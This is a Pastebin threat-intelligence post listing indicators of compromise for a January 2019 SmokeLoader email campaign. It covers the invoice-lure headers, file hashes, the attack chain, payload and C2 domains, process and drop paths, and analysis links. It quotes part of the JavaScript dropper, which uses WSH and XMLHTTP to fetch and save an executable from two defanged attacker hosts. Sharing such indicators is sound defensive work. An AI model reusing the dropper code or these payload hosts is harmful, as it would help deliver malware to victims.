Advertisement
VRad

#smokeloader_110119

Jan 11th, 2019
553
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.45 KB | None | 0 0
  1. #IOC #OptiData #VR #smokeloader #WSH #LZH
  2.  
  3. https://pastebin.com/b8PkhMyN
  4.  
  5. previous contact:
  6. https://pastebin.com/hkskwKvc
  7. https://pastebin.com/JmthzrL4
  8. https://pastebin.com/1scwT0f8
  9. https://pastebin.com/MP3kCSSh
  10.  
  11. FAQ:
  12. https://radetskiy.wordpress.com/2018/10/19/ioc_smokeloader_111018/
  13.  
  14. attack_vector
  15. --------------
  16. email attach (lzh) > js > WSH > GET 2 URL > AppData\Roaming\Microsoft\Windows\Templates\*.exe
  17.  
  18. email_headers
  19. --------------
  20. Received: from mx.fm.ukrtelecom.ua (mx.fm.ukrtelecom.ua [82.207.79.108])
  21. by srv8.victim1.com for <user0@org7.victim1.com>;
  22. Fri, 11 Jan 2019 03:25:51 +0200 (EET) (envelope-from zagviddil@ukrpost.ua)
  23. Received: from mail5.ukrpost.ua (mail5.ukrpost.ua [82.207.79.5]) by mx.fm.ukrtelecom.ua
  24. Received: from [37.120.146.92] (helo=37.120.146.92)
  25. by mail5.ukrpost.ua (envelope-from <zagviddil@ukrpost.ua>)
  26. From: "Иван Богданович <zagviddil@ukrpost.ua>"
  27. Subject: Счет фактура за текущий месяц
  28. To: "user0" <user0@org7.victim1.com>
  29. Reply-To: "Иван Богданович <zagviddil@ukrpost.ua>" <inter4room@ukr.net>
  30.  
  31. files
  32. --------------
  33. SHA-256 ecac0091a03fbf8f1583254af92c850a3740c79ecd22659ab0ec7447b399bdbd
  34. File name Счета по текущему 11.01.2019.lzh [LHarc 1.x/ARX archive data [lh0]]
  35. File size 42 KB
  36.  
  37. SHA-256 3b97d0ef429100c6ec88d1ecca237eff66887db9e76223ce586f47f5fc1b568a
  38. File name Pax. 052-2019.ods [OpenDocument Spreadsheet]
  39. File size 15.71 KB
  40.  
  41. SHA-256 69a9d87277f8cd364f68187c08235b4d61c47b7021e87f9d742c55a03223289c
  42. File name Pax. 052-2019.js [ASCII text]
  43. File size 26.21 KB
  44.  
  45. SHA-256 fd630b999bda6ccd94747d8c33869c3bfb20a0ab546464821a67509d2a79d38a
  46. File name liter.exe [PE32 executable (GUI) Intel 80386, for MS Windows]
  47. File size 205 KB
  48.  
  49. activity
  50. **************
  51.  
  52. dropper_script:
  53. wsh = new ActiveXObject("wscript.shell");
  54. path = wsh.SpecialFolders("templates")+"\\"+((Math.random()*999999)+9999|0)+".exe";
  55. HTTP = new ActiveXObject("MSXML2.XMLHTTP"); Stream = new ActiveXObject("ADODB.Stream");
  56. HTTP.Open("GET", "musicaustriallc{.} ru/instadoc/liter.exe", false);
  57. ...
  58. else { HTTP.Open("GET", "telemagistralinc{.} info/instadoc/liter.exe", false);
  59. ...
  60.  
  61. PL musicaustriallc{.} ru/instadoc/liter.exe
  62. telemagistralinc{.} info/instadoc/liter.exe
  63.  
  64. C2 aviatorssm{.} bit/
  65.  
  66. netwrk
  67. --------------
  68. 176.53.161.28 musicaustriallc{.} ru GET /instadoc/liter.exe HTTP/1.1 Mozilla/4.0
  69. This program cannot be run in DOS mode.
  70.  
  71. comp
  72. --------------
  73. wscript.exe 968 TCP 176.53.161.28 80 ESTABLISHED
  74.  
  75. proc
  76. --------------
  77. C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\Pax. 052-2019.js
  78. C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\250221.exe
  79.  
  80. persist
  81. --------------
  82. n/a (detects vm, sleeps)
  83.  
  84. drop
  85. --------------
  86. C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\250221.exe
  87.  
  88. # # #
  89. https://www.virustotal.com/#/file/ecac0091a03fbf8f1583254af92c850a3740c79ecd22659ab0ec7447b399bdbd/details
  90. https://www.virustotal.com/#/file/3b97d0ef429100c6ec88d1ecca237eff66887db9e76223ce586f47f5fc1b568a/details
  91. https://www.virustotal.com/#/file/69a9d87277f8cd364f68187c08235b4d61c47b7021e87f9d742c55a03223289c/details
  92. https://www.virustotal.com/#/url/e9094e4d3a4b8c94425d33c6c423fc5e7ad9aba7f45ab4931d215aadb7d9111d/details
  93. https://www.virustotal.com/#/file/fd630b999bda6ccd94747d8c33869c3bfb20a0ab546464821a67509d2a79d38a/details
  94. https://analyze.intezer.com/#/analyses/051ebb20-165d-40b6-923d-a6eb78c9cdb7
  95.  
  96. VR
  97.  
  98. @
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement